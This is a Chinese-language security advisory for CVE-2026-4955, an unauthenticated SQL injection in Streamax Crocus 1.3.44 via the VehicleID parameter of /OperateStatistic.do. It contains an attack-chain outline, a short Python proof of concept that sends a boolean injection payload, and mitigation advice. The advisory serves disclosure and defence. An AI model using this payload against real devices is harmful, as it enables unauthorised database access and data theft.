CVE-2026-4955 Streamax Crocus SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-4955

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Shenzhen Ruiming Technology Streamax Crocus

漏洞概述

深圳市锐明技术股份有限公司的Streamax Crocus产品在1.3.44版本中存在严重的安全漏洞。该漏洞源于/OperateStatistic.do文件中的特定功能未能正确过滤用户输入。攻击者可以通过操纵VehicleID参数，构造恶意的SQL语句，从而在数据库上执行非法操作。由于该漏洞无需身份验证即可远程利用，且攻击复杂度低，因此对系统安全性构成严重威胁。漏洞利用代码已被公开，供应商尚未对此做出响应，建议受影响用户尽快采取防护措施。

技术细节

该漏洞属于典型的SQL注入漏洞。在Streamax Crocus 1.3.44版本中，/OperateStatistic.do接口接收用户提交的VehicleID参数，并将其直接拼接到后端数据库查询语句中，未进行任何有效的输入验证或过滤。攻击者可以通过发送特制的HTTP请求，在VehicleID参数中注入SQL控制字符（如单引号、注释符）或UNION查询语句。由于无需用户交互和身份认证，攻击者可远程利用此漏洞。成功利用后，攻击者可能读取数据库中的敏感信息（如用户凭证、车辆信息）、修改数据或破坏数据库完整性。攻击向量为网络，利用难度低，影响范围包括机密性、完整性和可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网络上运行的Shenzhen Ruiming Technology Streamax Crocus设备，并确定其版本为1.3.44。

STEP 2

2. 构造载荷

攻击者利用已知的漏洞细节，针对/OperateStatistic.do接口的VehicleID参数构造包含恶意SQL语句的HTTP请求。

STEP 3

3. 发送请求

攻击者向目标服务器发送特制的HTTP GET或POST请求，无需任何用户认证或交互。

STEP 4

4. 执行注入

后端数据库服务器接收到未经过滤的VehicleID参数，并将其拼接进SQL查询语句中执行，导致注入攻击生效。

STEP 5

5. 获取权限

攻击者利用SQL注入漏洞读取敏感数据、修改数据库内容或执行其他数据库管理操作，影响系统的机密性、完整性和可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(target_url):
    """
    Proof of Concept for CVE-2026-4955
    Checks for SQL Injection in VehicleID parameter
    """
    # Target endpoint based on vulnerability description
    endpoint = "/OperateStatistic.do"
    full_url = f"{target_url}{endpoint}"
    
    # Simple boolean-based SQL injection payload
    # This payload attempts to make the query evaluate to true
    payload = "1' AND '1'='1"
    
    params = {
        "VehicleID": payload
    }
    
    try:
        print(f"[+] Sending request to {full_url}...")
        response = requests.get(full_url, params=params, timeout=10)
        
        # Analyze response (Logic depends on application behavior)
        if response.status_code == 200:
            print(f"[+] Request successful. Status Code: {response.status_code}")
            print(f"[+] Response length: {len(response.text)}")
            print("[!] Further analysis required to confirm data exfiltration.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target IP/Domain
    target = "http://192.168.1.100"
    check_sqli(target)

影响范围

Shenzhen Ruiming Technology Streamax Crocus 1.3.44

防御指南

临时缓解措施

由于供应商尚未对此披露做出响应，目前尚无官方补丁。建议管理员在网络边界封锁外部对/OperateStatistic.do路径的访问，或通过WAF添加规则过滤VehicleID参数中的单引号、注释符等恶意字符。同时，应加强对数据库的审计监控，一旦发现异常查询行为，立即进行阻断。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4955
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4955
3 Details https://www.cvedetails.com/cve/CVE-2026-4955/
4 VulDB https://vuldb.com/cve/CVE-2026-4955
5 Link https://my.feishu.cn/docx/C16HdO89zo9OCrxn5B2c8bTqnvb?from=from_copylink
6 Link https://vuldb.com/?ctiid.353143
7 Link https://vuldb.com/?id.353143
8 Link https://vuldb.com/?submit.776083
9 Link https://vuldb.com/?submit.778514